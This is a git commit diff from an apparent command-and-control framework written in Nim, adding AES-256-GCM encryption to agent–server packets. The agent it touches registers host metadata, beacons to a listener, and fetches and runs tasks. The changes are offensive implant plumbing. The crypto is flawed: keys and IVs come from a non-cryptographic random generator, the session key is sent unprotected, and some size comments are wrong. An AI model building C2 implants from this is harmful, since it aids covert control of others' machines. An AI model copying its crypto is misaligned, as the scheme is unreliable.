Implemented AES256-GCM encryption of all network packets. Requires some more refactoring to remove redundant code and make it cleaner.

This commit is contained in:
Jakob Friedl
2025-07-23 13:47:37 +02:00
parent 36719dd7f0
commit 0f065f41a2
16 changed files with 298 additions and 207 deletions

View File

@@ -1,6 +1,6 @@
import times import times
import ../../../common/[types, serialize, utils] import ../../../common/[types, serialize, utils, crypto]
proc createHeartbeat*(config: AgentConfig): Heartbeat = proc createHeartbeat*(config: AgentConfig): Heartbeat =
return Heartbeat( return Heartbeat(
@@ -9,31 +9,35 @@ proc createHeartbeat*(config: AgentConfig): Heartbeat =
version: VERSION, version: VERSION,
packetType: cast[uint8](MSG_HEARTBEAT), packetType: cast[uint8](MSG_HEARTBEAT),
flags: cast[uint16](FLAG_PLAINTEXT), flags: cast[uint16](FLAG_PLAINTEXT),
seqNr: 0'u32, # Sequence number is not used for heartbeats
size: 0'u32, size: 0'u32,
hmac: default(array[16, byte]) agentId: uuidToUint32(config.agentId),
seqNr: 0'u64,
iv: generateIV(),
gmac: default(AuthenticationTag)
), ),
agentId: uuidToUint32(config.agentId),
listenerId: uuidToUint32(config.listenerId), listenerId: uuidToUint32(config.listenerId),
timestamp: uint32(now().toTime().toUnix()) timestamp: uint32(now().toTime().toUnix())
) )
proc serializeHeartbeat*(request: Heartbeat): seq[byte] = proc serializeHeartbeat*(config: AgentConfig, request: var Heartbeat): seq[byte] =
var packer = initPacker() var packer = initPacker()
# Serialize check-in / heartbeat request # Serialize check-in / heartbeat request
packer packer
.add(request.agentId)
.add(request.listenerId) .add(request.listenerId)
.add(request.timestamp) .add(request.timestamp)
let body = packer.pack() let body = packer.pack()
packer.reset() packer.reset()
# TODO: Encrypt check-in / heartbeat request body # Encrypt check-in / heartbeat request body
let (encData, gmac) = encrypt(config.sessionKey, request.header.iv, body, request.header.seqNr)
# Set authentication tag (GMAC)
request.header.gmac = gmac
# Serialize header # Serialize header
let header = packer.packHeader(request.header, uint32(body.len)) let header = packer.packHeader(request.header, uint32(encData.len))
return header & body return header & encData

View File

@@ -1,6 +1,5 @@
import httpclient, json, strformat, asyncdispatch import httpclient, json, strformat, asyncdispatch
import ./metadata
import ../../../common/[types, utils] import ../../../common/[types, utils]
const USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" const USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"

View File

@@ -1,6 +1,6 @@
import winim, os, net, strformat, strutils, registry import winim, os, net, strformat, strutils, registry, sugar
import ../../../common/[types, serialize, utils] import ../../../common/[types, serialize, crypto, utils]
# Hostname/Computername # Hostname/Computername
proc getHostname*(): string = proc getHostname*(): string =
@@ -200,12 +200,14 @@ proc collectAgentMetadata*(config: AgentConfig): AgentRegistrationData =
version: VERSION, version: VERSION,
packetType: cast[uint8](MSG_REGISTER), packetType: cast[uint8](MSG_REGISTER),
flags: cast[uint16](FLAG_PLAINTEXT), flags: cast[uint16](FLAG_PLAINTEXT),
seqNr: 1'u32, # TODO: Implement sequence tracking
size: 0'u32, size: 0'u32,
hmac: default(array[16, byte])
),
metadata: AgentMetadata(
agentId: uuidToUint32(config.agentId), agentId: uuidToUint32(config.agentId),
seqNr: 1'u64, # TODO: Implement sequence tracking
iv: generateIV(),
gmac: default(AuthenticationTag)
),
sessionKey: config.sessionKey,
metadata: AgentMetadata(
listenerId: uuidToUint32(config.listenerId), listenerId: uuidToUint32(config.listenerId),
username: getUsername().toBytes(), username: getUsername().toBytes(),
hostname: getHostname().toBytes(), hostname: getHostname().toBytes(),
@@ -219,13 +221,12 @@ proc collectAgentMetadata*(config: AgentConfig): AgentRegistrationData =
) )
) )
proc serializeRegistrationData*(data: AgentRegistrationData): seq[byte] = proc serializeRegistrationData*(config: AgentConfig, data: var AgentRegistrationData): seq[byte] =
var packer = initPacker() var packer = initPacker()
# Serialize registration data # Serialize registration data
packer packer
.add(data.metadata.agentId)
.add(data.metadata.listenerId) .add(data.metadata.listenerId)
.addVarLengthMetadata(data.metadata.username) .addVarLengthMetadata(data.metadata.username)
.addVarLengthMetadata(data.metadata.hostname) .addVarLengthMetadata(data.metadata.hostname)
@@ -240,9 +241,18 @@ proc serializeRegistrationData*(data: AgentRegistrationData): seq[byte] =
let metadata = packer.pack() let metadata = packer.pack()
packer.reset() packer.reset()
# TODO: Encrypt metadata # Encrypt metadata
let (encData, gmac) = encrypt(config.sessionKey, data.header.iv, metadata, data.header.seqNr)
# Set authentication tag (GMAC)
data.header.gmac = gmac
# Serialize header # Serialize header
let header = packer.packHeader(data.header, uint32(metadata.len)) let header = packer.packHeader(data.header, uint32(encData.len))
packer.reset()
return header & metadata # Serialize session key
packer.addData(data.sessionKey)
let key = packer.pack()
return header & key & encData

View File

@@ -1,7 +1,7 @@
import strutils, tables, json, strformat import strutils, tables, json, strformat, sugar
import ../commands/commands import ../commands/commands
import ../../../common/[types, serialize, utils] import ../../../common/[types, serialize, crypto, utils]
proc handleTask*(config: AgentConfig, task: Task): TaskResult = proc handleTask*(config: AgentConfig, task: Task): TaskResult =
@@ -20,40 +20,34 @@ proc handleTask*(config: AgentConfig, task: Task): TaskResult =
# Handle task command # Handle task command
return handlers[cast[CommandType](task.command)](config, task) return handlers[cast[CommandType](task.command)](config, task)
proc deserializeTask*(bytes: seq[byte]): Task = proc deserializeTask*(config: AgentConfig, bytes: seq[byte]): Task =
var unpacker = initUnpacker(bytes.toString) var unpacker = initUnpacker(bytes.toString)
let let header = unpacker.unpackHeader()
magic = unpacker.getUint32()
version = unpacker.getUint8()
packetType = unpacker.getUint8()
flags = unpacker.getUint16()
seqNr = unpacker.getUint32()
size = unpacker.getUint32()
hmacBytes = unpacker.getBytes(16)
# Explicit conversion from seq[byte] to array[16, byte]
var hmac: array[16, byte]
copyMem(hmac.addr, hmacBytes[0].unsafeAddr, 16)
# Packet Validation # Packet Validation
if magic != MAGIC: if header.magic != MAGIC:
raise newException(CatchableError, "Invalid magic bytes.") raise newException(CatchableError, "Invalid magic bytes.")
if packetType != cast[uint8](MSG_TASK): if header.packetType != cast[uint8](MSG_TASK):
raise newException(CatchableError, "Invalid packet type.") raise newException(CatchableError, "Invalid packet type.")
# TODO: Validate sequence number # TODO: Validate sequence number
# TODO: Validate HMAC # Decrypt payload
let payload = unpacker.getBytes(int(header.size))
# TODO: Decrypt payload let (decData, gmac) = decrypt(config.sessionKey, header.iv, payload, header.seqNr)
# let payload = unpacker.getBytes(size)
if gmac != header.gmac:
raise newException(CatchableError, "Invalid authentication tag (GMAC) for task.")
# Deserialize decrypted data
unpacker = initUnpacker(decData.toString)
let let
taskId = unpacker.getUint32() taskId = unpacker.getUint32()
agentId = unpacker.getUint32()
listenerId = unpacker.getUint32() listenerId = unpacker.getUint32()
timestamp = unpacker.getUint32() timestamp = unpacker.getUint32()
command = unpacker.getUint16() command = unpacker.getUint16()
@@ -68,17 +62,8 @@ proc deserializeTask*(bytes: seq[byte]): Task =
inc i inc i
return Task( return Task(
header: Header( header: header,
magic: magic,
version: version,
packetType: packetType,
flags: flags,
seqNr: seqNr,
size: size,
hmac: hmac
),
taskId: taskId, taskId: taskId,
agentId: agentId,
listenerId: listenerId, listenerId: listenerId,
timestamp: timestamp, timestamp: timestamp,
command: command, command: command,
@@ -86,7 +71,7 @@ proc deserializeTask*(bytes: seq[byte]): Task =
args: args args: args
) )
proc deserializePacket*(packet: string): seq[Task] = proc deserializePacket*(config: AgentConfig, packet: string): seq[Task] =
result = newSeq[Task]() result = newSeq[Task]()
@@ -104,6 +89,6 @@ proc deserializePacket*(packet: string): seq[Task] =
taskLength = unpacker.getUint32() taskLength = unpacker.getUint32()
taskBytes = unpacker.getBytes(int(taskLength)) taskBytes = unpacker.getBytes(int(taskLength))
result.add(deserializeTask(taskBytes)) result.add(config.deserializeTask(taskBytes))
dec taskCount dec taskCount

View File

@@ -1,20 +1,23 @@
import times import times, sugar
import ../../../common/[types, serialize, utils] import ../../../common/[types, serialize, crypto, utils]
proc createTaskResult*(task: Task, status: StatusType, resultType: ResultType, resultData: seq[byte]): TaskResult = proc createTaskResult*(task: Task, status: StatusType, resultType: ResultType, resultData: seq[byte]): TaskResult =
# TODO: Implement sequence tracking
return TaskResult( return TaskResult(
header: Header( header: Header(
magic: MAGIC, magic: MAGIC,
version: VERSION, version: VERSION,
packetType: cast[uint8](MSG_RESPONSE), packetType: cast[uint8](MSG_RESPONSE),
flags: cast[uint16](FLAG_PLAINTEXT), flags: cast[uint16](FLAG_PLAINTEXT),
seqNr: 1'u32, # TODO: Implement sequence tracking
size: 0'u32, size: 0'u32,
hmac: default(array[16, byte]) agentId: task.header.agentId,
seqNr: 1'u64,
iv: generateIV(),
gmac: default(array[16, byte])
), ),
taskId: task.taskId, taskId: task.taskId,
agentId: task.agentId,
listenerId: task.listenerId, listenerId: task.listenerId,
timestamp: uint32(now().toTime().toUnix()), timestamp: uint32(now().toTime().toUnix()),
command: task.command, command: task.command,
@@ -24,14 +27,13 @@ proc createTaskResult*(task: Task, status: StatusType, resultType: ResultType, r
data: resultData, data: resultData,
) )
proc serializeTaskResult*(taskResult: TaskResult): seq[byte] = proc serializeTaskResult*(config: AgentConfig, taskResult: var TaskResult): seq[byte] =
var packer = initPacker() var packer = initPacker()
# Serialize result body # Serialize result body
packer packer
.add(taskResult.taskId) .add(taskResult.taskId)
.add(taskResult.agentId)
.add(taskResult.listenerId) .add(taskResult.listenerId)
.add(taskResult.timestamp) .add(taskResult.timestamp)
.add(taskResult.command) .add(taskResult.command)
@@ -45,11 +47,13 @@ proc serializeTaskResult*(taskResult: TaskResult): seq[byte] =
let body = packer.pack() let body = packer.pack()
packer.reset() packer.reset()
# TODO: Encrypt result body # Encrypt result body
let (encData, gmac) = encrypt(config.sessionKey, taskResult.header.iv, body, taskResult.header.seqNr)
# Set authentication tag (GMAC)
taskResult.header.gmac = gmac
# Serialize header # Serialize header
let header = packer.packHeader(taskResult.header, uint32(body.len)) let header = packer.packHeader(taskResult.header, uint32(encData.len))
# TODO: Calculate and patch HMAC return header & encData
return header & body

View File

@@ -1,8 +1,8 @@
import strformat, os, times, random import strformat, os, times, random
import winim import winim
import core/[task, taskresult, heartbeat, http, metadata] import core/[task, taskresult, heartbeat, http, register]
import ../../common/[types, utils] import ../../common/[types, utils, crypto]
import sugar import sugar
const ListenerUuid {.strdefine.}: string = "" const ListenerUuid {.strdefine.}: string = ""
@@ -40,12 +40,13 @@ proc main() =
listenerId: ListenerUuid, listenerId: ListenerUuid,
ip: address, ip: address,
port: ListenerPort, port: ListenerPort,
sleep: SleepDelay sleep: SleepDelay,
sessionKey: generateSessionKey(), # Generate a new AES256 session key for encrypted communication
) )
# Create registration payload # Create registration payload
let registrationData: AgentRegistrationData = config.collectAgentMetadata() var registration: AgentRegistrationData = config.collectAgentMetadata()
let registrationBytes = serializeRegistrationData(registrationData) let registrationBytes = config.serializeRegistrationData(registration)
config.register(registrationBytes) config.register(registrationBytes)
echo fmt"[+] [{config.agentId}] Agent registered." echo fmt"[+] [{config.agentId}] Agent registered."
@@ -68,16 +69,16 @@ proc main() =
# Retrieve task queue for the current agent by sending a check-in/heartbeat request # Retrieve task queue for the current agent by sending a check-in/heartbeat request
# The check-in request contains the agentId, listenerId, so the server knows which tasks to return # The check-in request contains the agentId, listenerId, so the server knows which tasks to return
let var heartbeat: Heartbeat = config.createHeartbeat()
heartbeat: Heartbeat = config.createHeartbeat() let
heartbeatData: seq[byte] = serializeHeartbeat(heartbeat) heartbeatBytes: seq[byte] = config.serializeHeartbeat(heartbeat)
packet: string = config.getTasks(heartbeatData) packet: string = config.getTasks(heartbeatBytes)
if packet.len <= 0: if packet.len <= 0:
echo "No tasks to execute." echo "No tasks to execute."
continue continue
let tasks: seq[Task] = deserializePacket(packet) let tasks: seq[Task] = config.deserializePacket(packet)
if tasks.len <= 0: if tasks.len <= 0:
echo "No tasks to execute." echo "No tasks to execute."
@@ -85,12 +86,10 @@ proc main() =
# Execute all retrieved tasks and return their output to the server # Execute all retrieved tasks and return their output to the server
for task in tasks: for task in tasks:
let var result: TaskResult = config.handleTask(task)
result: TaskResult = config.handleTask(task) let resultBytes: seq[byte] = config.serializeTaskResult(result)
resultData: seq[byte] = serializeTaskResult(result)
# echo resultData config.postResults(resultBytes)
config.postResults(resultData)
when isMainModule: when isMainModule:
main() main()

View File

@@ -1,8 +1,8 @@
# Agent configuration # Agent configuration
-d:ListenerUuid="B10CE89E" -d:ListenerUuid="A5466110"
-d:Octet1="127" -d:Octet1="172"
-d:Octet2="0" -d:Octet2="29"
-d:Octet3="0" -d:Octet3="177"
-d:Octet4="1" -d:Octet4="43"
-d:ListenerPort=9999 -d:ListenerPort=8888
-d:SleepDelay=5 -d:SleepDelay=5

View File

@@ -0,0 +1,48 @@
import random
import nimcrypto
import ./[utils, types]
proc generateSessionKey*(): Key =
# Generate a random 256-bit (32-byte) session key for AES-256 encryption
var key: array[32, byte]
for i in 0 ..< 32:
key[i] = byte(rand(255))
return key
proc generateIV*(): Iv =
# Generate a random 98-bit (12-byte) initialization vector for AES-256 GCM mode
var iv: array[12, byte]
for i in 0 ..< 12:
iv[i] = byte(rand(255))
return iv
proc encrypt*(key: Key, iv: Iv, data: seq[byte], sequenceNumber: uint64): (seq[byte], AuthenticationTag) =
# Encrypt data using AES-256 GCM
var encData = newSeq[byte](data.len)
var tag: AuthenticationTag
var ctx: GCM[aes256]
ctx.init(key, iv, sequenceNumber.toBytes())
ctx.encrypt(data, encData)
ctx.getTag(tag)
ctx.clear()
return (encData, tag)
proc decrypt*(key: Key, iv: Iv, encData: seq[byte], sequenceNumber: uint64): (seq[byte], AuthenticationTag) =
# Decrypt data using AES-256 GCM
var data = newSeq[byte](encData.len)
var tag: AuthenticationTag
var ctx: GCM[aes256]
ctx.init(key, iv, sequenceNumber.toBytes())
ctx.decrypt(encData, data)
ctx.getTag(tag)
ctx.clear()
return (data, tag)

View File

@@ -99,6 +99,39 @@ proc getBytes*(unpacker: Unpacker, length: int): seq[byte] =
if bytesRead != length: if bytesRead != length:
raise newException(IOError, "Not enough data to read") raise newException(IOError, "Not enough data to read")
proc getKey*(unpacker: Unpacker): Key =
var key: Key
let bytesRead = unpacker.stream.readData(key[0].unsafeAddr, 32)
unpacker.position += bytesRead
if bytesRead != 32:
raise newException(IOError, "Not enough data to read key")
return key
proc getIv*(unpacker: Unpacker): Iv =
var iv: Iv
let bytesRead = unpacker.stream.readData(iv[0].unsafeAddr, 12)
unpacker.position += bytesRead
if bytesRead != 12:
raise newException(IOError, "Not enough data to read IV")
return iv
proc getAuthenticationTag*(unpacker: Unpacker): AuthenticationTag =
var tag: AuthenticationTag
let bytesRead = unpacker.stream.readData(tag[0].unsafeAddr, 16)
unpacker.position += bytesRead
if bytesRead != 16:
raise newException(IOError, "Not enough data to read authentication tag")
return tag
proc getArgument*(unpacker: Unpacker): TaskArg = proc getArgument*(unpacker: Unpacker): TaskArg =
result.argType = unpacker.getUint8() result.argType = unpacker.getUint8()
@@ -133,8 +166,23 @@ proc packHeader*(packer: Packer, header: Header, bodySize: uint32): seq[byte] =
.add(header.version) .add(header.version)
.add(header.packetType) .add(header.packetType)
.add(header.flags) .add(header.flags)
.add(header.seqNr)
.add(bodySize) .add(bodySize)
.addData(header.hmac) .add(header.agentId)
.add(header.seqNr)
.addData(header.iv)
.addData(header.gmac)
return packer.pack() return packer.pack()
proc unpackHeader*(unpacker: Unpacker): Header=
return Header(
magic: unpacker.getUint32(),
version: unpacker.getUint8(),
packetType: unpacker.getUint8(),
flags: unpacker.getUint16(),
size: unpacker.getUint32(),
agentId: unpacker.getUint32(),
seqNr: unpacker.getUint64(),
iv: unpacker.getIv(),
gmac: unpacker.getAuthenticationTag()
)

View File

@@ -7,7 +7,7 @@ import streams
const const
MAGIC* = 0x514E3043'u32 # Magic value: C0NQ MAGIC* = 0x514E3043'u32 # Magic value: C0NQ
VERSION* = 1'u8 # Version 1 VERSION* = 1'u8 # Version 1
HEADER_SIZE* = 32'u8 # 32 bytes fixed packet header size HEADER_SIZE* = 52'u8 # 48 bytes fixed packet header size
type type
PacketType* = enum PacketType* = enum
@@ -49,14 +49,24 @@ type
RESULT_BINARY = 1'u8 RESULT_BINARY = 1'u8
RESULT_NO_OUTPUT = 2'u8 RESULT_NO_OUTPUT = 2'u8
# Encryption
type
Key* = array[32, byte]
Iv* = array[12, byte]
AuthenticationTag* = array[16, byte]
# Packet structure
type
Header* = object Header* = object
magic*: uint32 # [4 bytes ] magic value magic*: uint32 # [4 bytes ] magic value
version*: uint8 # [1 byte ] protocol version version*: uint8 # [1 byte ] protocol version
packetType*: uint8 # [1 byte ] message type packetType*: uint8 # [1 byte ] message type
flags*: uint16 # [2 bytes ] message flags flags*: uint16 # [2 bytes ] message flags
seqNr*: uint32 # [4 bytes ] sequence number / nonce size*: uint32 # [4 bytes ] size of the payload body
size*: uint32 # [4 bytes ] size of the payload body agentId*: uint32 # [4 bytes ] agent id, used as AAD for encryptio
hmac*: array[16, byte] # [16 bytes] hmac for message integrity seqNr*: uint64 # [8 bytes ] sequence number, used as AAD for encryption
iv*: Iv # [12 bytes] random IV for AES256 GCM encryption
gmac*: AuthenticationTag # [16 bytes] authentication tag for AES256 GCM encryption
TaskArg* = object TaskArg* = object
argType*: uint8 # [1 byte ] argument type argType*: uint8 # [1 byte ] argument type
@@ -66,7 +76,6 @@ type
header*: Header header*: Header
taskId*: uint32 # [4 bytes ] task id taskId*: uint32 # [4 bytes ] task id
agentId*: uint32 # [4 bytes ] agent id
listenerId*: uint32 # [4 bytes ] listener id listenerId*: uint32 # [4 bytes ] listener id
timestamp*: uint32 # [4 bytes ] unix timestamp timestamp*: uint32 # [4 bytes ] unix timestamp
command*: uint16 # [2 bytes ] command id command*: uint16 # [2 bytes ] command id
@@ -77,7 +86,6 @@ type
header*: Header header*: Header
taskId*: uint32 # [4 bytes ] task id taskId*: uint32 # [4 bytes ] task id
agentId*: uint32 # [4 bytes ] agent id
listenerId*: uint32 # [4 bytes ] listener id listenerId*: uint32 # [4 bytes ] listener id
timestamp*: uint32 # [4 bytes ] unix timestamp timestamp*: uint32 # [4 bytes ] unix timestamp
command*: uint16 # [2 bytes ] command id command*: uint16 # [2 bytes ] command id
@@ -104,16 +112,14 @@ type
# Checkin binary structure # Checkin binary structure
type type
Heartbeat* = object Heartbeat* = object
header*: Header header*: Header # [48 bytes ] fixed header
agentId*: uint32 # [4 bytes ] agent id listenerId*: uint32 # [4 bytes ] listener id
listenerId*: uint32 # [4 bytes ] listener id timestamp*: uint32 # [4 bytes ] unix timestamp
timestamp*: uint32
# Registration binary structure # Registration binary structure
type type
# All variable length fields are stored as seq[byte], prefixed with 4 bytes indicating the length of the following data # All variable length fields are stored as seq[byte], prefixed with 4 bytes indicating the length of the following data
AgentMetadata* = object AgentMetadata* = object
agentId*: uint32
listenerId*: uint32 listenerId*: uint32
username*: seq[byte] username*: seq[byte]
hostname*: seq[byte] hostname*: seq[byte]
@@ -127,7 +133,7 @@ type
AgentRegistrationData* = object AgentRegistrationData* = object
header*: Header header*: Header
# encMaterial*: seq[byte] # Encryption material for the agent registration sessionKey*: Key # [32 bytes ] AES 256 session key
metadata*: AgentMetadata metadata*: AgentMetadata
# Agent structure # Agent structure
@@ -148,6 +154,7 @@ type
tasks*: seq[Task] tasks*: seq[Task]
firstCheckin*: DateTime firstCheckin*: DateTime
latestCheckin*: DateTime latestCheckin*: DateTime
sessionKey*: Key
# Listener structure # Listener structure
type type
@@ -176,4 +183,5 @@ type
listenerId*: string listenerId*: string
ip*: string ip*: string
port*: int port*: int
sleep*: int sleep*: int
sessionKey*: Key

View File

@@ -50,4 +50,16 @@ proc toBytes*(value: uint32): seq[byte] =
byte((value shr 8) and 0xFF), byte((value shr 8) and 0xFF),
byte((value shr 16) and 0xFF), byte((value shr 16) and 0xFF),
byte((value shr 24) and 0xFF) byte((value shr 24) and 0xFF)
]
proc toBytes*(value: uint64): seq[byte] =
return @[
byte(value and 0xFF),
byte((value shr 8) and 0xFF),
byte((value shr 16) and 0xFF),
byte((value shr 24) and 0xFF),
byte((value shr 32) and 0xFF),
byte((value shr 40) and 0xFF),
byte((value shr 48) and 0xFF),
byte((value shr 56) and 0xFF)
] ]

View File

@@ -20,7 +20,7 @@ proc register*(registrationData: seq[byte]): bool =
# The following line is required to be able to use the `cq` global variable for console output # The following line is required to be able to use the `cq` global variable for console output
{.cast(gcsafe).}: {.cast(gcsafe).}:
let agent: Agent = deserializeNewAgent(registrationData) let agent: Agent = cq.deserializeNewAgent(registrationData)
# Validate that listener exists # Validate that listener exists
if not cq.dbListenerExists(agent.listenerId.toUpperAscii): if not cq.dbListenerExists(agent.listenerId.toUpperAscii):
@@ -45,8 +45,8 @@ proc getTasks*(checkinData: seq[byte]): seq[seq[byte]] =
# Deserialize checkin request to obtain agentId and listenerId # Deserialize checkin request to obtain agentId and listenerId
let let
request: Heartbeat = deserializeHeartbeat(checkinData) request: Heartbeat = cq.deserializeHeartbeat(checkinData)
agentId = uuidToString(request.agentId) agentId = uuidToString(request.header.agentId)
listenerId = uuidToString(request.listenerId) listenerId = uuidToString(request.listenerId)
timestamp = request.timestamp timestamp = request.timestamp
@@ -68,8 +68,8 @@ proc getTasks*(checkinData: seq[byte]): seq[seq[byte]] =
# return nil # return nil
# Return tasks # Return tasks
for task in cq.agents[agentId].tasks: for task in cq.agents[agentId].tasks.mitems: # Iterate over mutable items in order to modify GMAC
let taskData = serializeTask(task) let taskData = cq.serializeTask(task)
result.add(taskData) result.add(taskData)
return result return result
@@ -79,9 +79,9 @@ proc handleResult*(resultData: seq[byte]) =
{.cast(gcsafe).}: {.cast(gcsafe).}:
let let
taskResult = deserializeTaskResult(resultData) taskResult = cq.deserializeTaskResult(resultData)
taskId = uuidToString(taskResult.taskId) taskId = uuidToString(taskResult.taskId)
agentId = uuidToString(taskResult.agentId) agentId = uuidToString(taskResult.header.agentId)
listenerId = uuidToString(taskResult.listenerId) listenerId = uuidToString(taskResult.listenerId)
let date: string = now().format("dd-MM-yyyy HH:mm:ss") let date: string = now().format("dd-MM-yyyy HH:mm:ss")

View File

@@ -21,7 +21,10 @@ proc register*(ctx: Context) {.async.} =
return return
try: try:
let agentId = register(ctx.request.body.toBytes()) if not register(ctx.request.body.toBytes()):
resp "", Http400
return
resp "", Http200 resp "", Http200
except CatchableError: except CatchableError:

View File

@@ -156,7 +156,7 @@ proc startServer*() =
cq.dbInit() cq.dbInit()
cq.restartListeners() cq.restartListeners()
cq.addMultiple(cq.dbGetAllAgents()) cq.addMultiple(cq.dbGetAllAgents())
# Main loop # Main loop
while true: while true:
cq.setIndicator("[conquest]> ") cq.setIndicator("[conquest]> ")

View File

@@ -1,15 +1,14 @@
import strutils, strformat, streams, times import strutils, strformat, streams, times, tables
import ../utils import ../utils
import ../../common/[types, utils, serialize] import ../../common/[types, utils, serialize, crypto]
proc serializeTask*(task: Task): seq[byte] = proc serializeTask*(cq: Conquest, task: var Task): seq[byte] =
var packer = initPacker() var packer = initPacker()
# Serialize payload # Serialize payload
packer packer
.add(task.taskId) .add(task.taskId)
.add(task.agentId)
.add(task.listenerId) .add(task.listenerId)
.add(task.timestamp) .add(task.timestamp)
.add(task.command) .add(task.command)
@@ -21,49 +20,46 @@ proc serializeTask*(task: Task): seq[byte] =
let payload = packer.pack() let payload = packer.pack()
packer.reset() packer.reset()
# TODO: Encrypt payload body # Encrypt payload body
let (encData, gmac) = encrypt(cq.agents[uuidToString(task.header.agentId)].sessionKey, task.header.iv, payload, task.header.seqNr)
# Set authentication tag (GMAC)
task.header.gmac = gmac
# Serialize header # Serialize header
let header = packer.packHeader(task.header, uint32(payload.len)) let header = packer.packHeader(task.header, uint32(payload.len))
# TODO: Calculate and patch HMAC return header & encData
return header & payload proc deserializeTaskResult*(cq: Conquest, resultData: seq[byte]): TaskResult =
proc deserializeTaskResult*(resultData: seq[byte]): TaskResult =
var unpacker = initUnpacker(resultData.toString) var unpacker = initUnpacker(resultData.toString)
let let header = unpacker.unpackHeader()
magic = unpacker.getUint32()
version = unpacker.getUint8()
packetType = unpacker.getUint8()
flags = unpacker.getUint16()
seqNr = unpacker.getUint32()
size = unpacker.getUint32()
hmacBytes = unpacker.getBytes(16)
# Explicit conversion from seq[byte] to array[16, byte]
var hmac: array[16, byte]
copyMem(hmac.addr, hmacBytes[0].unsafeAddr, 16)
# Packet Validation # Packet Validation
if magic != MAGIC: if header.magic != MAGIC:
raise newException(CatchableError, "Invalid magic bytes.") raise newException(CatchableError, "Invalid magic bytes.")
if packetType != cast[uint8](MSG_RESPONSE): if header.packetType != cast[uint8](MSG_RESPONSE):
raise newException(CatchableError, "Invalid packet type for task result, expected MSG_RESPONSE.") raise newException(CatchableError, "Invalid packet type for task result, expected MSG_RESPONSE.")
# TODO: Validate sequence number # TODO: Validate sequence number
# TODO: Validate HMAC # Decrypt payload
let payload = unpacker.getBytes(int(header.size))
# TODO: Decrypt payload let (decData, gmac) = decrypt(cq.agents[uuidToString(header.agentId)].sessionKey, header.iv, payload, header.seqNr)
# let payload = unpacker.getBytes(size)
# Verify that the authentication tags match, which ensures the integrity of the decrypted data and AAD
if gmac != header.gmac:
raise newException(CatchableError, "Invalid authentication tag (GMAC) for task result.")
# Deserialize decrypted data
unpacker = initUnpacker(decData.toString)
let let
taskId = unpacker.getUint32() taskId = unpacker.getUint32()
agentId = unpacker.getUint32()
listenerId = unpacker.getUint32() listenerId = unpacker.getUint32()
timestamp = unpacker.getUint32() timestamp = unpacker.getUint32()
command = unpacker.getUint16() command = unpacker.getUint16()
@@ -71,19 +67,10 @@ proc deserializeTaskResult*(resultData: seq[byte]): TaskResult =
resultType = unpacker.getUint8() resultType = unpacker.getUint8()
length = unpacker.getUint32() length = unpacker.getUint32()
data = unpacker.getBytes(int(length)) data = unpacker.getBytes(int(length))
return TaskResult( return TaskResult(
header: Header( header: header,
magic: magic,
version: version,
packetType: packetType,
flags: flags,
seqNr: seqNr,
size: size,
hmac: hmac
),
taskId: taskId, taskId: taskId,
agentId: agentId,
listenerId: listenerId, listenerId: listenerId,
timestamp: timestamp, timestamp: timestamp,
command: command, command: command,
@@ -93,39 +80,35 @@ proc deserializeTaskResult*(resultData: seq[byte]): TaskResult =
data: data data: data
) )
proc deserializeNewAgent*(data: seq[byte]): Agent = proc deserializeNewAgent*(cq: Conquest, data: seq[byte]): Agent =
var unpacker = initUnpacker(data.toString) var unpacker = initUnpacker(data.toString)
let let header= unpacker.unpackHeader()
magic = unpacker.getUint32()
version = unpacker.getUint8()
packetType = unpacker.getUint8()
flags = unpacker.getUint16()
seqNr = unpacker.getUint32()
size = unpacker.getUint32()
hmacBytes = unpacker.getBytes(16)
# Explicit conversion from seq[byte] to array[16, byte]
var hmac: array[16, byte]
copyMem(hmac.addr, hmacBytes[0].unsafeAddr, 16)
# Packet Validation # Packet Validation
if magic != MAGIC: if header.magic != MAGIC:
raise newException(CatchableError, "Invalid magic bytes.") raise newException(CatchableError, "Invalid magic bytes.")
if packetType != cast[uint8](MSG_REGISTER): if header.packetType != cast[uint8](MSG_REGISTER):
raise newException(CatchableError, "Invalid packet type for agent registration, expected MSG_REGISTER.") raise newException(CatchableError, "Invalid packet type for agent registration, expected MSG_REGISTER.")
# TODO: Validate sequence number # TODO: Validate sequence number
# TODO: Validate HMAC # Decrypt payload
let sessionKey = unpacker.getKey()
let payload = unpacker.getBytes(int(header.size))
# TODO: Decrypt payload let (decData, gmac) = decrypt(sessionKey, header.iv, payload, header.seqNr)
# let payload = unpacker.getBytes(size)
# Verify that the authentication tags match, which ensures the integrity of the decrypted data and AAD
if gmac != header.gmac:
raise newException(CatchableError, "Invalid authentication tag (GMAC) for agent registration.")
# Deserialize decrypted data
unpacker = initUnpacker(decData.toString)
let let
agentId = unpacker.getUint32()
listenerId = unpacker.getUint32() listenerId = unpacker.getUint32()
username = unpacker.getVarLengthMetadata() username = unpacker.getVarLengthMetadata()
hostname = unpacker.getVarLengthMetadata() hostname = unpacker.getVarLengthMetadata()
@@ -138,7 +121,7 @@ proc deserializeNewAgent*(data: seq[byte]): Agent =
sleep = unpacker.getUint32() sleep = unpacker.getUint32()
return Agent( return Agent(
agentId: uuidToString(agentId), agentId: uuidToString(header.agentId),
listenerId: uuidToString(listenerId), listenerId: uuidToString(listenerId),
username: username, username: username,
hostname: hostname, hostname: hostname,
@@ -152,51 +135,38 @@ proc deserializeNewAgent*(data: seq[byte]): Agent =
jitter: 0.0, # TODO: Remove jitter jitter: 0.0, # TODO: Remove jitter
tasks: @[], tasks: @[],
firstCheckin: now(), firstCheckin: now(),
latestCheckin: now() latestCheckin: now(),
sessionKey: sessionKey
) )
proc deserializeHeartbeat*(data: seq[byte]): Heartbeat = proc deserializeHeartbeat*(cq: Conquest, data: seq[byte]): Heartbeat =
var unpacker = initUnpacker(data.toString) var unpacker = initUnpacker(data.toString)
let let header = unpacker.unpackHeader()
magic = unpacker.getUint32()
version = unpacker.getUint8()
packetType = unpacker.getUint8()
flags = unpacker.getUint16()
seqNr = unpacker.getUint32()
size = unpacker.getUint32()
hmacBytes = unpacker.getBytes(16)
# Explicit conversion from seq[byte] to array[16, byte]
var hmac: array[16, byte]
copyMem(hmac.addr, hmacBytes[0].unsafeAddr, 16)
# Packet Validation # Packet Validation
if magic != MAGIC: if header.magic != MAGIC:
raise newException(CatchableError, "Invalid magic bytes.") raise newException(CatchableError, "Invalid magic bytes.")
